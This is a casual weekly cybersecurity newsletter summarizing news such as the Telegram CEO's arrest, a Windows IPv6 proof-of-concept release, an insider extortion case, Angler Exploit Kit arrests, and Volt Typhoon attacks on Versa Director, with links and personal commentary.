Read Time: 7 minutes

Howdy friends!

Anyone else just really tired this week? I feel like a bunch of people, myself included, that I’ve bumped into are just running on a lower gear the past few days.

I did have some time this morning with a good friend that really invigorated me. We’re also hiring a bit of help at the Vulnerable U side of things to bring you all even cooler stuff in the coming months. Excited!

Let’s get Vulnerable.

ICYMI

🖊️ Something I wrote: This thread on the TechCrunch’s highlight of the best talks out of Vegas this month

🎧️ Something I heard: Anyone else on D&D social algorithm? I started getting memes related to a fake campaign involving a Goblin named Fartbuckle and it features an epic new Childish Gambino song. RIP Fartbuckle.

🎤 Something I said: I was on the Decipher podcast and I’ve gotten about half a dozen texts from people saying it was a good one. So apparently folks listen to it and I didn’t make a fool of myself.

🔖 Something I read: My friend Jen Leggio’s interview with my other friend Runa - Rising Tides: Runa Sandvik on Creating Work that Makes a Difference

Vulnerable News

Telegram Saga

Ok there is a lot here. Telegram CEO got arrested and the whole Internet blew up into attack vs. defend Telegram camps.

I don’t have a lot of opinions on his arrest itself. But boy howdy do people have a misguided view of what Telegram is. A LOT of people in my comments saying this is because Telegram is so secure that the government can’t get access to data. I can’t state clearly enough that Telegram is not to be viewed as an encrypted messenger. It has encrypted chat capabilities that are not on by default and the protocol under the hood is not open source like Signal.

Also, the most popular feature of Telegram is the group chats a la Discord and those can never be encrypted so cops can just join them and see everything.

Lot to read here if you’re into it:

• WSJ - Telegram Founder Was Wooed and Targeted by Governments

• NYTimes - Telegram Founder Charged With Wide Range of Crimes in France

• Rob Graham - Some thoughts on the arrest of Pavel Durov (Telegram CEO)

• NYTimes - How Telegram’s Founder Went From Russia’s Mark Zuckerberg to Wanted Man

• 404 Media - How Telegram's Founder Pavel Durov Became a Culture War Martyr

• Matthew Green - Is Telegram really an encrypted messaging app?

Proof-of-concept code released for zero-click critical Windows vuln

Remember when I told you about this 0-click IPv6 vuln that all Windows boxes were vulnerable to? And then remember I said as soon as a PoC was available it would be a way higher priority and more likely to be exploited. Well today is the day! Get to patching if you haven’t already! (read more)

Russian government hackers found using exploits made by spyware companies NSO and Intellexa

mattjayy

86K followers

View more on Instagram

Employee arrested for locking Windows admins out of 254 servers in extortion plot

You know what they say about not burning bridges when you leave a job? Well, Daniel Rhyne from Kansas City took that advice, crumpled it up, and set it on fire. This 57-year-old core infrastructure engineer decided to go out with a bang, locking Windows admins out of 254 servers and demanding €700,000 in Bitcoin. Taking a severance package into your own hands.

Our wannabe hacker extraordinaire thought he was being clever, using a hidden VM for his dirty work and scheduling tasks to change passwords to "TheFr0zenCrew!" But pro tip: if you're planning cybercrime, maybe don't use your work laptop to Google "how to delete domain accounts" and "command line to change local administrator password."

The FBI wasn't amused, and now Rhyne's facing up to 35 years in prison and a $750,000 fine. Looks like he'll have plenty of time to brush up on his cybersecurity skills. (read more)

US offers $2.5 million reward for hacker linked to Angler Exploit Kit

Angler Exploit Kit… Now there is a name I haven’t heard in a long time. If you were in infosec around 10 years ago, this thing was everywhere. It was an absolute bane of our existence. You think ransomware is bad now? People were getting popped via ads on normal news websites. I can say one good thing about it though: I think it was part of what finally killed Flash. Angler would have a new Flash RCE every freaking week. Jeremiah Grossman once called it death by slow roll 0day. Adobe published stats on how much it cost them to fix a bug that would be publicly disclosed first and it was …not cheap.

Anyway. The couple of guys behind Angler are getting arrested. One is already locked up and they’re putting a bounty on the other.

“Kadariya was identified as one of Maksim Silnikau's co-conspirators, who participated in global-scale malware distribution operations with Andrei Tarasov.

Silnikau (aka "J.P. Morgan"), the creator and operator of Ransom Cartel, Reveton ransomware, and Angler Exploit Kit, was arrested in Spain and later extradited to the United States, where he faces multiple charges incurring sentences of up to 100 years in prison.” (read more)

New 0-Day Attacks Linked to China’s ‘Volt Typhoon’

This story isn’t getting enough attention IMO. There are reports coming out that China has compromised Versa Director which is used by some major ISPs.

“After gaining access to the victims' networks via the exposed Versa management port, the attackers deployed the VersaMem web shell, which steals credentials and then allows Volt Typhoon to access the service providers' customers' networks as authenticated users.”

Also kind of wild, in the vulnerability advisory Versa then blames their customers for leaving the management portal open on the Internet. I mean they’re not wrong, but…

The scary part for me: “Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT [operational technology] assets to disrupt functions,” (read more)

Ukrainian hackers show war footage on Russian TV, source says

Ukrainian hackers have struck again, this time hitting Russian TV channels right where it hurts - prime time. According to a source in Ukraine's military intelligence (HUR), they managed to break into several Russian TV servers and broadcast "objective videos about the war in Ukraine."

The hack reportedly affected nine channels, including some owned by Russian oligarch Andrey Komarov. Most had to suspend broadcasting, with only a couple partially resuming operations as of Aug 22. One TV company even issued an apology on VKontakte, blaming "attackers" for airing content that "contradicts the TV channel's policy."

This isn't HUR's first rodeo - they've previously claimed responsibility for cyberattacks on Russian websites and financial institutions. (read more)

Microsoft plans September cybersecurity event to discuss changes after CrowdStrike outage

Microsoft's throwing a cybersecurity shindig next month, and it's all thanks to that little CrowdStrike incident that had Windows blue-screening left and right in July. They're inviting the who's who of the security world to their Redmond campus on September 10th to brainstorm how to avoid another dumpster fire.

Seems like they’re proposing shifting more security operations from kernel mode to user mode. It's not a silver bullet, but it could help prevent small hiccups from turning into system-wide meltdowns.

They're also talking about eBPF tech and memory-safe languages like Rust. It's a delicate dance though - these security tools need deep access to do their job, but that same access can cause chaos when things go sideways. (read more)

TL;DR: Every AI Talk from BSidesLV, Black Hat, and DEF CON 2024

Clint is the man. He went through and found every talk from summer camp that had anything to do with AI and compiled them all together. With summaries and his thoughts on it to boot. Epic work Clint! (read more)

The gift that keeps on giving: A new opportunistic Log4j campaign

Log4j?! Insert What Year Is It?! Meme. Anyway, great report from the security team at Datadog who dug in after scratching their head over seeing a new wave of log4j hit some honeypots. Seems threat actors are still modifying some post exploitation techniques using this bug. Report full of techniques and IOCs for your reading pleasure (read more)

Miscellaneous mattjay

This meme got me really good. My friends were eye rolling at me for laughing so hard.

Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay